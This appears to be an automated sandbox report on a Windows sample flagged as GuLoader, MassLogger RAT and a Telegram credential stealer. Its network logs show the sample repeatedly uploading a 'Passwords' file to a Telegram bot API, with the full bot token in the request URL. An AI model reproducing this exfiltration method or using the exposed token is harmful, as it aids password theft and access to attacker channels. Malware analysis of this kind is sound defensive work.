                                                                                                                  2025-01-10 21:40:33 UTC539INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 32 33 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":44777,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736545233,"document":{"file_name":"U


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.649995149.154.167.2204436068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 21:40:36 UTC274OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary================8dd31d834762ebc
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 1090
                                                                                                                  2025-01-10 21:40:36 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 64 38 33 34 37 36 32 65 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: --===============8dd31d834762ebcContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                  2025-01-10 21:40:36 UTC388INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:36 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 538
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  2025-01-10 21:40:36 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 32 33 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":44778,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736545236,"document":{"file_name":"U


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.649997149.154.167.2204436068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 21:40:38 UTC274OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary================8dd31f3cdf768db
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 1090
                                                                                                                  2025-01-10 21:40:38 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 33 63 64 66 37 36 38 64 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: --===============8dd31f3cdf768dbContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                  2025-01-10 21:40:39 UTC388INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:39 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 538
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  2025-01-10 21:40:39 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 32 33 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":44779,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736545238,"document":{"file_name":"U


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.650000149.154.167.2204436068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 21:40:41 UTC274OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary================8dd320f49a41694
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 1090
                                                                                                                  2025-01-10 21:40:41 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 30 66 34 39 61 34 31 36 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: --===============8dd320f49a41694Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                  2025-01-10 21:40:41 UTC388INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:41 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 538
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  2025-01-10 21:40:41 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 32 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":44780,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736545241,"document":{"file_name":"U


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.650003149.154.167.2204436068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 21:40:48 UTC298OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary================8dd326264810fe1
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 1090
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 21:40:48 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 36 32 36 34 38 31 30 66 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: --===============8dd326264810fe1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                  2025-01-10 21:40:49 UTC388INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:49 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 538
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  2025-01-10 21:40:49 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 32 34 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":44781,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736545249,"document":{"file_name":"U


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  10192.168.2.650006149.154.167.2204436068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 21:40:57 UTC298OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary================8dd32c1c1e4108d
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 1090
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 21:40:57 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 63 31 63 31 65 34 31 30 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: --===============8dd32c1c1e4108dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                  2025-01-10 21:40:58 UTC388INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:57 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 538
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  2025-01-10 21:40:58 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 32 35 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":44782,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736545257,"document":{"file_name":"U


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  11192.168.2.650008149.154.167.220443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 21:41:04 UTC274OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary================8dd3195926fe3f3
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 1090
                                                                                                                  2025-01-10 21:41:04 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 39 35 39 32 36 66 65 33 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: --===============8dd3195926fe3f3Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                  2025-01-10 21:41:05 UTC388INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Fri, 10 Jan 2025 21:41:05 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 538
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  2025-01-10 21:41:05 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 32 36 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":44783,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736545265,"document":{"file_name":"U


                                                                                                                  Click to jump to process

                                                                                                                  Click to jump to process

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Click to jump to process

                                                                                                                  Target ID:0
                                                                                                                  Start time:16:38:53
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\9Yn5tjyOgT.exe"
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:1'008'728 bytes
                                                                                                                  MD5 hash:1E1FB3E8D33AB075679A645F298D4715
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2773955750.00000000070E9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:6
                                                                                                                  Start time:16:39:56
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\9Yn5tjyOgT.exe"
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:1'008'728 bytes
                                                                                                                  MD5 hash:1E1FB3E8D33AB075679A645F298D4715
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000002.3432675851.0000000036E4B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3432675851.0000000036E4B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3432675851.0000000036E4B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.3405749429.0000000005439000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:20.6%
                                                                                                                    Dynamic/Decrypted Code Coverage:13.5%
                                                                                                                    Signature Coverage:19.5%
                                                                                                                    Total number of Nodes:1598
                                                                                                                    Total number of Limit Nodes:38
